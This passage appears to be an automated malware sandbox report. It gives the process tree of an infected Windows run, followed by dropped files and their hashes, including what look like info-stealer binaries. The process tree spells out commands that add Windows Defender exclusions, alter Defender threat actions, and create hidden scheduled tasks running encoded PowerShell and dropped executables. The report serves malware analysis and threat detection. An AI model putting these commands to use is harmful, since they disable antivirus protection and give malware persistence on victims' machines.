                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                                  3⤵
                                                                                                                    PID:228
                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                                    3⤵
                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                    PID:1940
                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\lIHFFsfKyjyLqsRzk /t REG_DWORD /d 0 /reg:32
                                                                                                                    3⤵
                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                    PID:2996
                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\lIHFFsfKyjyLqsRzk /t REG_DWORD /d 0 /reg:64
                                                                                                                    3⤵
                                                                                                                      PID:1560
                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\WOZjflCZCOyVKBHr /t REG_DWORD /d 0 /reg:32
                                                                                                                      3⤵
                                                                                                                        PID:4664
                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\WOZjflCZCOyVKBHr /t REG_DWORD /d 0 /reg:64
                                                                                                                        3⤵
                                                                                                                          PID:4888
                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                        schtasks /CREATE /TN "gvyfaTiTC" /SC once /ST 11:22:14 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                                        2⤵
                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                        PID:5552
                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                        schtasks /run /I /tn "gvyfaTiTC"
                                                                                                                        2⤵
                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                        PID:4828
                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                        schtasks /DELETE /F /TN "gvyfaTiTC"
                                                                                                                        2⤵
                                                                                                                          PID:5964
                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                          schtasks /CREATE /TN "rcInNidKFBcqPzeLo" /SC once /ST 09:40:38 /RU "SYSTEM" /TR "\"C:\Windows\Temp\WOZjflCZCOyVKBHr\RlcoOLrZgEaKdXr\mGNZimr.exe\" xh /bULjdidXr 385107 /S" /V1 /F
                                                                                                                          2⤵
                                                                                                                          • Drops file in Windows directory
                                                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                                                          PID:752
                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                          schtasks /run /I /tn "rcInNidKFBcqPzeLo"
                                                                                                                          2⤵
                                                                                                                            PID:4280
                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5572 -s 1336
                                                                                                                            2⤵
                                                                                                                            • Program crash
                                                                                                                            PID:1068
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                          C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                          1⤵
                                                                                                                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                          • Checks BIOS information in registry
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Identifies Wine through registry keys
                                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                          PID:1464
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
                                                                                                                          C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
                                                                                                                          1⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          PID:3972
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\service123.exe
                                                                                                                          C:\Users\Admin\AppData\Local\Temp\/service123.exe
                                                                                                                          1⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Loads dropped DLL
                                                                                                                          PID:3712
                                                                                                                        • C:\Users\Admin\Pictures\Lighter Tech\runtime.exe
                                                                                                                          "C:\Users\Admin\Pictures\Lighter Tech\runtime.exe"
                                                                                                                          1⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                          PID:3044
                                                                                                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                                                                                                                            2⤵
                                                                                                                              PID:1128
                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                            1⤵
                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                            PID:1012
                                                                                                                            • C:\Windows\system32\gpupdate.exe
                                                                                                                              "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                              2⤵
                                                                                                                                PID:2956
                                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                                              C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                                                                                                              1⤵
                                                                                                                                PID:3136
                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                                1⤵
                                                                                                                                  PID:3060
                                                                                                                                • C:\Windows\system32\gpscript.exe
                                                                                                                                  gpscript.exe /RefreshSystemParam
                                                                                                                                  1⤵
                                                                                                                                    PID:5236
                                                                                                                                  • C:\Windows\Temp\WOZjflCZCOyVKBHr\RlcoOLrZgEaKdXr\mGNZimr.exe
                                                                                                                                    C:\Windows\Temp\WOZjflCZCOyVKBHr\RlcoOLrZgEaKdXr\mGNZimr.exe xh /bULjdidXr 385107 /S
                                                                                                                                    1⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    PID:5804
                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                      "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                      2⤵
                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                      PID:5272
                                                                                                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                                                                                        3⤵
                                                                                                                                        • Indirect Command Execution
                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                        PID:5900
                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                          4⤵
                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                          PID:4320
                                                                                                                                          • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                            5⤵
                                                                                                                                              PID:2260
                                                                                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                          forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                                                                                          3⤵
                                                                                                                                          • Indirect Command Execution
                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                          PID:3336
                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                            4⤵
                                                                                                                                              PID:5084
                                                                                                                                              • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                                5⤵
                                                                                                                                                  PID:5332
                                                                                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                              forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                                                                                              3⤵
                                                                                                                                              • Indirect Command Execution
                                                                                                                                              PID:5736
                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                4⤵
                                                                                                                                                  PID:4640
                                                                                                                                                  • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                    5⤵
                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                    PID:4772
                                                                                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                                                                                3⤵
                                                                                                                                                • Indirect Command Execution
                                                                                                                                                PID:6088
                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                  4⤵
                                                                                                                                                    PID:4916
                                                                                                                                                    • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                      5⤵
                                                                                                                                                        PID:5816
                                                                                                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                    forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                    3⤵
                                                                                                                                                    • Indirect Command Execution
                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                    PID:4920
                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                      4⤵
                                                                                                                                                        PID:1700
                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                          5⤵
                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                          PID:948
                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 5572 -ip 5572
                                                                                                                                                  1⤵
                                                                                                                                                    PID:5140

                                                                                                                                                  Network

                                                                                                                                                  MITRE ATT&CK Enterprise v15

                                                                                                                                                  Replay Monitor

                                                                                                                                                  Loading Replay Monitor...

                                                                                                                                                  Downloads

                                                                                                                                                  • C:\ProgramData\mozglue.dll

                                                                                                                                                    Filesize

                                                                                                                                                    593KB

                                                                                                                                                    MD5

                                                                                                                                                    c8fd9be83bc728cc04beffafc2907fe9

                                                                                                                                                    SHA1

                                                                                                                                                    95ab9f701e0024cedfbd312bcfe4e726744c4f2e

                                                                                                                                                    SHA256

                                                                                                                                                    ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

                                                                                                                                                    SHA512

                                                                                                                                                    fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

                                                                                                                                                  • C:\ProgramData\nss3.dll

                                                                                                                                                    Filesize

                                                                                                                                                    2.0MB

                                                                                                                                                    MD5

                                                                                                                                                    1cc453cdf74f31e4d913ff9c10acdde2

                                                                                                                                                    SHA1

                                                                                                                                                    6e85eae544d6e965f15fa5c39700fa7202f3aafe

                                                                                                                                                    SHA256

                                                                                                                                                    ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5

                                                                                                                                                    SHA512

                                                                                                                                                    dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

                                                                                                                                                  • C:\Users\Admin\1000238002\Amadeus.exe

                                                                                                                                                    Filesize

                                                                                                                                                    5.3MB

                                                                                                                                                    MD5

                                                                                                                                                    36a627b26fae167e6009b4950ff15805

                                                                                                                                                    SHA1

                                                                                                                                                    f3cb255ab3a524ee05c8bab7b4c01c202906b801

                                                                                                                                                    SHA256

                                                                                                                                                    a2389de50f83a11d6fe99639fc5c644f6d4dcea6834ecbf90a4ead3d5f36274a

                                                                                                                                                    SHA512

                                                                                                                                                    2133aba3e2a41475b2694c23a9532c238abab0cbae7771de83f9d14a8b2c0905d44b1ba0b1f7aae501052f4eba0b6c74018d66c3cbc8e8e3443158438a621094

                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\crypteda.exe.log

                                                                                                                                                    Filesize

                                                                                                                                                    42B

                                                                                                                                                    MD5

                                                                                                                                                    84cfdb4b995b1dbf543b26b86c863adc

                                                                                                                                                    SHA1

                                                                                                                                                    d2f47764908bf30036cf8248b9ff5541e2711fa2

                                                                                                                                                    SHA256

                                                                                                                                                    d8988d672d6915b46946b28c06ad8066c50041f6152a91d37ffa5cf129cc146b

                                                                                                                                                    SHA512

                                                                                                                                                    485f0ed45e13f00a93762cbf15b4b8f996553baa021152fae5aba051e3736bcd3ca8f4328f0e6d9e3e1f910c96c4a9ae055331123ee08e3c2ce3a99ac2e177ce

                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\1000002001\gold.exe

                                                                                                                                                    Filesize

                                                                                                                                                    313KB

                                                                                                                                                    MD5

                                                                                                                                                    2d647cf43622ed10b6d733bb5f048fc3

                                                                                                                                                    SHA1

                                                                                                                                                    6b9c5f77a9ef064a23e5018178f982570cbc64c6

                                                                                                                                                    SHA256

                                                                                                                                                    41426dd54fcabbf30a68b2aa11aa4f61f3862bea83109d3e3c50cfebed1359e6

                                                                                                                                                    SHA512

                                                                                                                                                    62400f1e9646268f0326aab5b95efacb0303f4c5879cccf0cbb24d1f66d0db40d0fdfebb09ba785b5dfd54df2d32e8aab48c1f5f333956b606112de68635ac3a

                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\1000004001\crypteda.exe

                                                                                                                                                    Filesize

                                                                                                                                                    1.1MB

                                                                                                                                                    MD5

                                                                                                                                                    8e74497aff3b9d2ddb7e7f819dfc69ba

                                                                                                                                                    SHA1

                                                                                                                                                    1d18154c206083ead2d30995ce2847cbeb6cdbc1

                                                                                                                                                    SHA256

                                                                                                                                                    d8e81d9e336ef37a37cae212e72b6f4ef915db4b0f2a8df73eb584bd25f21e66

                                                                                                                                                    SHA512

                                                                                                                                                    9aacc5c130290a72f1087daa9e79984565ccab6dbcad5114bfed0919812b9ba5f8dee9c37d230eeca4df3cca47ba0b355fbf49353e53f10f0ebc266e93f49f97

                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\1000005001\Nework.exe

                                                                                                                                                    Filesize

                                                                                                                                                    416KB

                                                                                                                                                    MD5

                                                                                                                                                    f5d7b79ee6b6da6b50e536030bcc3b59

                                                                                                                                                    SHA1

                                                                                                                                                    751b555a8eede96d55395290f60adc43b28ba5e2

                                                                                                                                                    SHA256

                                                                                                                                                    2f1aff28961ba0ce85ea0e35b8936bc387f84f459a4a1d63d964ce79e34b8459

                                                                                                                                                    SHA512

                                                                                                                                                    532b17cd2a6ac5172b1ddba1e63edd51ab53a4527204415241e3a78e8ffeb9728071bde5ae1eefabefd2627f00963f8a5458668cd7b8df041c8683252ff56b46

                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\1000019001\joffer2.exe

                                                                                                                                                    Filesize

                                                                                                                                                    6.3MB

                                                                                                                                                    MD5

                                                                                                                                                    0857e05e60f7043cc225770fbfbd9813

                                                                                                                                                    SHA1

                                                                                                                                                    ea62c4e5470df8d3703fe2c345aecd5692b51a56

                                                                                                                                                    SHA256

                                                                                                                                                    8f6a80db2b88528afd90d1bd38860a69573d0127b069983ef89e46c495c57543

                                                                                                                                                    SHA512

                                                                                                                                                    fe7c9abc314e286265f4aec24a1919a06c30cb53b447eaf69f34dd9281d816c06228019643163e9224cc1a399d4bb2683225ac6e47ad41fa0b3126473713f369

                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe

                                                                                                                                                    Filesize

                                                                                                                                                    187KB

                                                                                                                                                    MD5

                                                                                                                                                    7a02aa17200aeac25a375f290a4b4c95

                                                                                                                                                    SHA1

                                                                                                                                                    7cc94ca64268a9a9451fb6b682be42374afc22fd

                                                                                                                                                    SHA256

                                                                                                                                                    836799fd760eba25e15a55c75c50b977945c557065a708317e00f2c8f965339e

                                                                                                                                                    SHA512

                                                                                                                                                    f6ebfe7e087aa354722cea3fddd99b1883a862fb92bb5a5a86782ea846a1bff022ab7db4397930bcabaa05cb3d817de3a89331d41a565bc1da737f2c5e3720b6

                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\1000129001\Sеtup.exe

                                                                                                                                                    Filesize

                                                                                                                                                    6.3MB

                                                                                                                                                    MD5

                                                                                                                                                    a2ead3670d2d61e86c0f6d8df5c4392a

                                                                                                                                                    SHA1

                                                                                                                                                    4a46e64c70897504c28b94b645488d3a71d25dc5

                                                                                                                                                    SHA256

                                                                                                                                                    2ca7f5dfcd3f7664c8c6f02bb23203d0a9f032f5197b303c2aca00830e175501

                                                                                                                                                    SHA512

                                                                                                                                                    84dde0f2b584076c59b55a357df9050f79570252d9bed7bc034f09a653463a57cb3a0e435367953a9c86f03e2405060520a2d87b97937bf369900874db083892

                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\1000169001\contorax.exe

                                                                                                                                                    Filesize

                                                                                                                                                    102KB

                                                                                                                                                    MD5

                                                                                                                                                    771b8e84ba4f0215298d9dadfe5a10bf

                                                                                                                                                    SHA1

                                                                                                                                                    0f5e4c440cd2e7b7d97723424ba9c56339036151

                                                                                                                                                    SHA256

                                                                                                                                                    3f074fb6a883663f2937fd9435fc90f8d31ceabe496627d40b3813dbcc472ed0

                                                                                                                                                    SHA512

                                                                                                                                                    2814ef23653c9be5f5e7245af291cf330c355ed12b4db76f71b4de699c67a9ffd1bdc0cc1df5352335b57ab920404b9c8e81cd9257527264bde4f72a53700164

                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\1000172001\3546345.exe

                                                                                                                                                    Filesize

                                                                                                                                                    2.7MB

                                                                                                                                                    MD5

                                                                                                                                                    fd2defc436fc7960d6501a01c91d893e

                                                                                                                                                    SHA1

                                                                                                                                                    5faa092857c3c892eab49e7c0e5ac12d50bce506

                                                                                                                                                    SHA256

                                                                                                                                                    ba13da01c41fa50ec5e340061973bc912b1f41cd1f96a7cae5d40afc00ff7945

                                                                                                                                                    SHA512

                                                                                                                                                    9a3e1f2dc5104d8636dc27af4c0f46bdb153fcfada98831b5af95eeb09bb7ef3c7e19927d8f06884a6837e10889380645b6138644f0c08b9cb2e59453041ec42

                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\1000191001\needmoney.exe

                                                                                                                                                    Filesize

                                                                                                                                                    3.6MB

                                                                                                                                                    MD5

                                                                                                                                                    7e6a519688246fe1180f35fe0d25d370

                                                                                                                                                    SHA1

                                                                                                                                                    8e8719ac897dfef7305311dc216f570af40709af

                                                                                                                                                    SHA256

                                                                                                                                                    32a927e9b33371b82bae9f02b5ebf07c19ae5a3a7e3c0cd3fcbee7cfff7f257a

                                                                                                                                                    SHA512

                                                                                                                                                    a751e911eb254749a3c8c98740f455a5be32ce1af94dc90eba8fc677d6d7379303f80247748dfcfe9c8570edb3488a5af97fa7ff29c815bec6824dd491e27972

                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\1000226001\fikbbm0902845.exe

                                                                                                                                                    Filesize

                                                                                                                                                    17B

                                                                                                                                                    MD5

                                                                                                                                                    c965aa525ae4cfbc3b45c6b7e9271a59

                                                                                                                                                    SHA1

                                                                                                                                                    3a84d4c1c9277173b530263107af4caf1f61213f

                                                                                                                                                    SHA256

                                                                                                                                                    50ea6c698e72e13b8132b66bbca9479b7f4815ebb2f8adb3ca1cfec79523107e

                                                                                                                                                    SHA512

                                                                                                                                                    bfddf9f5cb766b20f564b6a94048d1779431794b02cbd0993f4f3554b46b1a4e17bd3def58200da665fd991d1480b22992181ef543413d8013a19889484c3f1c

                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\1000243001\runtime.exe

                                                                                                                                                    Filesize

                                                                                                                                                    44KB

                                                                                                                                                    MD5

                                                                                                                                                    b73cf29c0ea647c353e4771f0697c41f

                                                                                                                                                    SHA1

                                                                                                                                                    3e5339b80dcfbdc80d946fc630c657654ef58de7

                                                                                                                                                    SHA256

                                                                                                                                                    edd76f144bbdbfc060f7cb7e19863f89eb55863efc1a913561d812083b6306cd

                                                                                                                                                    SHA512

                                                                                                                                                    2274d4c1e0ef72dc7e73b977e315ddd5472ec35a52e3449b1f6b87336ee18ff8966fed0451d19d24293fde101e0c231a3caa08b7bd0047a18a41466c2525e2e8

                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\1000254001\penis.exe

                                                                                                                                                    Filesize

                                                                                                                                                    552KB

                                                                                                                                                    MD5

                                                                                                                                                    03cf06e01384018ac325de8bc160b4b2

                                                                                                                                                    SHA1

                                                                                                                                                    1853505e502b392fd556a9ce6050207230cc70cd

                                                                                                                                                    SHA256

                                                                                                                                                    5ab3785b2b72eaf7edff8961eb8ff8dd3dc6cc7031bc96ceb06a899b6fb3bbbc

                                                                                                                                                    SHA512

                                                                                                                                                    be1f2cf898db93e96e8817bf2d0ab0ef0f49d5bba4efba2de4046f6b381e8eda6ff5fcfdc057b6cbc4de5b3a7b096612c1e0d6b0d395ee685b3844ba5dc0e1b6

                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\1000255001\channel2.exe

                                                                                                                                                    Filesize

                                                                                                                                                    301B

                                                                                                                                                    MD5

                                                                                                                                                    80e238aaf61301785fac44e9e7e21fb3

                                                                                                                                                    SHA1

                                                                                                                                                    a91d7a47b22219a33eec684cb11711fcfa9d2cab

                                                                                                                                                    SHA256

                                                                                                                                                    23eb00fc9d25042dec9a2456623a4f19c282d878ece26d4a31a732d6d76eb234

                                                                                                                                                    SHA512

                                                                                                                                                    af69d12f2d7c03ddd4c5a3b203b017ebc8e90cbdcfdc133cc789e1def1bd82ed5e7d582b5529d00e19d9298e398a15ec7180b1b4c540ff34ba87df51da104db9

                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\1000256001\BowExpert.exe

                                                                                                                                                    Filesize

                                                                                                                                                    1.3MB

                                                                                                                                                    MD5

                                                                                                                                                    db2a12edc73769f2f2b6b01545afe2c3

                                                                                                                                                    SHA1

                                                                                                                                                    73dc44fb0753296f51b851299f468031ceb77b54

                                                                                                                                                    SHA256

                                                                                                                                                    e6db7d34b498982601b2c45ac5b2a1c1b9502e502514ccffae9862f2aa719f42

                                                                                                                                                    SHA512

                                                                                                                                                    dadf36bc9c5d88c28b9064892cc263c912ce668435b71802df756c0a4e680f8407011d36498a2511dda7165aea866c0ae794f9ec8fbcc42c7da1661399316ce4

                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\1000259001\bundle.exe

                                                                                                                                                    Filesize

                                                                                                                                                    304KB

                                                                                                                                                    MD5

                                                                                                                                                    30daa686c1f31cc4833bd3d7283d8cdc

                                                                                                                                                    SHA1

                                                                                                                                                    70f74571fafe1b359cfe9ce739c3752e35d16cf5

                                                                                                                                                    SHA256

                                                                                                                                                    504518e3b4f3abc7f1ae1bf205fdc4a9f739e05b5e84618bae9c7e66bdc19822

                                                                                                                                                    SHA512

                                                                                                                                                    9f6c0eea9f03f9aa35ebf27ce8264e41d9072d273d1b8a35415ae4666d31013d895d1108dd67e36910200e2ac4fc45a4a9d761a1aadf02b0fd29ef93cd20a4d9

                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\1000260001\5KNCHALAH.exe

                                                                                                                                                    Filesize

                                                                                                                                                    1.6MB

                                                                                                                                                    MD5

                                                                                                                                                    3f99c2698fc247d19dd7f42223025252

                                                                                                                                                    SHA1

                                                                                                                                                    043644883191079350b2f2ffbefef5431d768f99

                                                                                                                                                    SHA256

                                                                                                                                                    ba8561bf19251875a15471812042adac49f825c69c3087054889f6107297c6f3

                                                                                                                                                    SHA512

                                                                                                                                                    6a88d1049059bba8f0c9498762502e055107d9f82dbc0aacfdd1e1c138bdb875cf68c2b7998408f8235e53b2bb864ba6f43c249395640b62af305a62b9bfcd67

                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\1000260001\Channel1.exe

                                                                                                                                                    Filesize

                                                                                                                                                    6.4MB

                                                                                                                                                    MD5

                                                                                                                                                    4d445f9a6549ae05b9e136f1e7ffa45a

                                                                                                                                                    SHA1

                                                                                                                                                    70b95f68bc199edba2db5e4e161813c47fcf5aa2

                                                                                                                                                    SHA256

                                                                                                                                                    8cf6f866925650049c693fa5b57236375ae2f47d73b99081b5ed96da32bf41f8

                                                                                                                                                    SHA512

                                                                                                                                                    8bf51a516d5f43fba27ee564d836211be74ce73d98869e4fd385825df474e25bf06bd1870f7e87e4ecb74118d464149bee7f83951e103914306aa3e15989747b

                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\1000262001\385107.exe

                                                                                                                                                    Filesize

                                                                                                                                                    7.3MB

                                                                                                                                                    MD5

                                                                                                                                                    67cb71962cdbc26da7d94a9b7b583ef2

                                                                                                                                                    SHA1

                                                                                                                                                    5be20b5824a405484dae36731b1d8d16754ea4a8

                                                                                                                                                    SHA256

                                                                                                                                                    213b86a87c21c4cd7a927c30c0f9786a7ab468d9ec0d24f7592cb1be229c60ad

                                                                                                                                                    SHA512

                                                                                                                                                    d2d27138987fb934930d526ecd0ba9f7b47f6fd3e354684df59d6ac4e10f47bb87f90e0919579189c03f0b37fd7f104ad7f595c2938f42a8a2d4843c04bb3cef

                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\1000268001\kitty.exe

                                                                                                                                                    Filesize

                                                                                                                                                    319KB

                                                                                                                                                    MD5

                                                                                                                                                    0ec1f7cc17b6402cd2df150e0e5e92ca

                                                                                                                                                    SHA1

                                                                                                                                                    8405b9bf28accb6f1907fbe28d2536da4fba9fc9

                                                                                                                                                    SHA256

